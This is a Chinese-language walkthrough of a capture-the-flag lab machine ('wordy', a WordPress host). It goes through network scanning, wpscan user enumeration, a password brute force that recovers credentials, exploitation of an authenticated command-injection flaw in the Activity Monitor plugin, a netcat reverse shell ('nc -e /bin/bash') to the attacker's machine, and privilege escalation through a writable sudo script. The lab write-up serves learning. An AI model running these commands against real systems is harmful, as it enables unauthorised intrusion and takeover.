🖳 主机发现

sudo netdiscover -i eth0 -r 192.168.1.0/24
 Currently scanning: Finished!   |   Screen View: Unique Hosts                                     
                                                                                                   
 21 Captured ARP Req/Rep packets, from 6 hosts.   Total size: 1260                                 
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.1.1     28:c8:7c:19:bf:e8     13     780  zte corporation                                 
 192.168.1.5     20:1e:88:ad:fc:55      1      60  Intel Corporate                                 
 192.168.1.4     c4:e1:a1:cf:47:95      4     240  GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,L
 192.168.1.6     0c:d8:6c:a5:e7:a1      1      60  SHENZHEN FAST TECHNOLOGIES CO.,LTD              
 192.168.1.14    08:00:27:e2:b6:88      1      60  PCS Systemtechnik GmbH                          
 192.168.1.3     a2:86:90:e6:04:98      1      60  Unknown vendor

目标是192.168.1.14

👁 服务扫描

# Nmap 7.94SVN scan initiated Fri Feb 16 15:50:20 2024 as: nmap -p- -oN nmap_scan -sV -sC --min-rate 5000 192.168.1.14
Nmap scan report for 192.168.1.14 (192.168.1.14)
Host is up (0.0016s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 3e:52:ce:ce:01:b6:94:eb:7b:03:7d:be:08:7f:5f:fd (RSA)
|   256 3c:83:65:71:dd:73:d7:23:f8:83:0d:e3:46:bc:b5:6f (ECDSA)
|_  256 41:89:9e:85:ae:30:5b:e0:8f:a4:68:71:06:b4:15:ee (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-title: Did not follow redirect to http://wordy/
|_http-server-header: Apache/2.4.25 (Debian)
MAC Address: 08:00:27:E2:B6:88 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Feb 16 15:50:28 2024 -- 1 IP address (1 host up) scanned in 8.69 seconds

发现重定向到*http://wordy/*这个网站，我们把它加入hosts文件中
发现主页是一个wordpress网站，对其进行扫描

wpscan -e vt,vp,u --url http://wordy/
[+] admin
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://wordy/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] graham
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] sarah
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] jens
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] mark
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

发现了很多用户，记录下来，然后尝试一下登录界面的弱口令，没有试出弱口令，那就尝试爆破，因为爆破路径也没有什么有趣的，那攻击向量只有web喝ssh，web又只有这个登录页面是暴露的。
根据作者的提示，生成一下密码字典

1	`cat /usr/share/wordlists/rockyou.txt \| grep k01 > passwords.txt`

尝试爆破

1	`wpscan --url http://wordy -U users -P passwords.txt`

得到了凭证

1	`mark:helpdesk01`

🚪🚶 获取权限

登录上之后，发现有一个Activity Monitor，搜索一下有没有漏洞

searchsploit Activity
···
WordPress Plugin Plainview Activity Monitor 20161228 - (Authenticated) Command Injection                                                | php/webapps/45274.html
WordPress Plugin Plainview Activity Monitor 20161228 - Remote Code Execution (RCE) (Authenticated) (2)                                  | php/webapps/50110.py
···

我们使用下面那个，执行之后输入ip，username，password，然后用nc反弹shell。

1	`nc -e /bin/bash 192.168.1.13 443`

🛡️ 提升权限

用linpeas.sh辅助提权脚本枚举信息

这里有俩个有趣的文件，我们可以在things-to-do.txt中发现用户gaham的凭证

我们用ssh登录上去，后进行一些枚举，发现可以以jens身份运行backups.sh脚本，且因为gaham用户是devs组，对该脚本有修改权限，我们可以在里面加一个/bin/bash来启动一个jens用户的shell